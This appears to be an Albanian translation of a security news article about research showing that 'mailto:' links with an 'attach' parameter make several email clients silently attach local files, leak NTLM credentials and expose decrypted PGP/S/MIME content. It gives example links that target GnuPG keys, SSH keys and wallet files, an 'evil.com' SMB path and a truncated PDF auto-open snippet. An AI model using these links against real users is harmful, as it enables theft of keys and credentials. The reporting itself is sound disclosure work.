Sulmi ndaj përdoruesve të klientëve të postës me lidhjet «mailto:»

Kërkuesit nga Universiteti Ruhr në Bochum (Gjermani) analizuan (PDF) sjelljen e klientëve të postës gjatë përpunimit të lidhjeve «mailto:» me parametra të zgjeruar. Pesë nga njëzet klientët e shqyrtuar të postës rezultuan të cenueshëm ndaj një sulmi që manipulon zëvendësimin e burimeve përmes parametrave «attach». Gjithashtu, gjashtë klientë të postës ishin të ndjeshëm ndaj sulmit nga zëvendësimi i çelësave PGP dhe S/MIME, dhe tre klientë rezultuan të kërcënuar nga sulmi për nxjerrjen e përmbajtjes së mesazheve të enkriptuara.

Lidhjet «mailto:» përdoren për automatizimin e hapjes së klientit të postës me qëllim që të shkruhet një letër për marrësin e specifikuar në lidhje. Përveç adresës brenda lidhjes, mund të specifikohen parametra të tjerë të shtuara, siç janë tema e letrës dhe një shabllon i përmbajtjes standarde. Sulmi i propozuar manipulon parametrin «attach», që lejon bashkimin e një dosjeje të bashkëngjitur në letrën e krijuar.

Klientët e postës Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) dhe Pegasus Mail rezultuan të cenueshëm ndaj një sulmi triviale, që lejon automatikisht bashkimin e çdo dosjeje lokale, e cila specifikohet përmes një lidhjeje si «mailto:?attach=rruga_e_dosjes». Dosja bashkëngjitet pa dalë ndonjë paralajmërim, kështu që pa rëndësinë e veçantë, përdoruesi mund të mos e kuptojë se letra do të dërgohet me bashkimin e një dosjeje.

Për shembull, me një lidhje si «mailto:?to=user@example.com&subject=Titulli&body=Teksti&attach=~\/ .gnupg\/secring.gpg» mund të ngjiten në letër çelësat e mbyllur nga GnuPG. Gjithashtu, mund të dërgohen përmbajtjet e portofolëve kripto (~\/ .bitcoin\/wallet.dat), çelësat SSH (~\/ .ssh\/id_rsa) dhe çdo dosje tjetër që është e aksesueshme për përdoruesin. Për më tepër, Thunderbird lejon bashkimin e grupeve të dosjeve përmes maskave duke përdorur konstrukte si «attach=\/tmp\/*.txt».

Përveç dosjeve lokale, disa klientë të postës përpunojnë lidhje për ruajturat në rrjet dhe rrugët në serverin IMAP. Në veçanti, IBM Notes lejon dërgimin e një dosjeje nga një katalog në rrjet gjatë përpunimit të lidhjeve si «attach=\\evil.com\dummyfile», si dhe kapjen e parametrave të autentifikimit NTLM duke dërguar një lidhje në një server SMB të kontrolluar nga sulmuesi (kërkesa do të dërgohet me parametrat aktualë të autentifikimit të përdoruesit).

Thunderbird përpunon me sukses kërkesat si «attach=imap://fetch>UID>/INBOX>1/», që lejojnë bashkimin e përmbajtjes nga dosjet në serverin IMAP. Në të njëjtën kohë, mesazhet e nxjerrura nga IMAP, të enkripuara përmes OpenPGP dhe S/MIME, automatizohen dhe dekriptohen nga klienti i postës përpara dërgimit. Zhvilluesit e Thunderbird ishin njoftuan të informuar për problemin në shkurt dhe në versionin Thunderbird 78 problemi tashmë është zgjidhur (deget e Thunderbird 52, 60 dhe 68 mbeten të cenueshme).

Versionet e vjetra të Thunderbird janë ndjerë të prekura edhe nga dy variante të tjera të sulmit mbi PGP dhe S/MIME të propozuara nga kërkuesit. Në veçanti, sulmi i zëvendësimit të çelësave u zbulua për Thunderbird, si dhe për OutLook, PostBox, eM Client, MailMate dhe R2Mail2, për shkak se klienti i postës importon dhe instalon automatikisht certifikatat e reja që dërgohen në mesazhet S/MIME, duke lejuar kështu që sulmuesi të zëvendësojë çelësat publikë të ruajtur tashmë nga përdoruesi.

Sulmi i dytë, i cili prek Thunderbird, PostBox dhe MailMate, manipulohet me veçoritë e mekanizmit të ruajtjes automatik të skicave të mesazheve, duke lejuar që përmes parametrave mailto të niste dekriptimin e mesazheve të koduara ose shtimin e një nënshkrimi digjital për mesazhe të rastësishme, me trasferimin më pas të rezultatit në serverin IMAP të sulmuesit. Gjithashtu, teksti i koduar në këtë sulm transmetohet përmes parametrin "body", dhe për të iniciuar kontaktin me serverin IMAP të sulmuesit përdoret etiketa "meta refresh". Për shembull: ‘’

Për përpunimin automatik të lidhjeve "mailto:" pa ndërhyrje nga përdoruesi, mund të përdoren dokumente PDF të përgatitura posaçërisht - veprimi OpenAction në PDF lejon që automatikisht të nisë trajtuesin e mailto kur hapet dokumenti:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Sulmi ndaj përdoruesve të klientëve të postës me anë të lidhjeve "mailto:"

Burimi: opennet.ru

Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS 🔥 Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS | ProHoster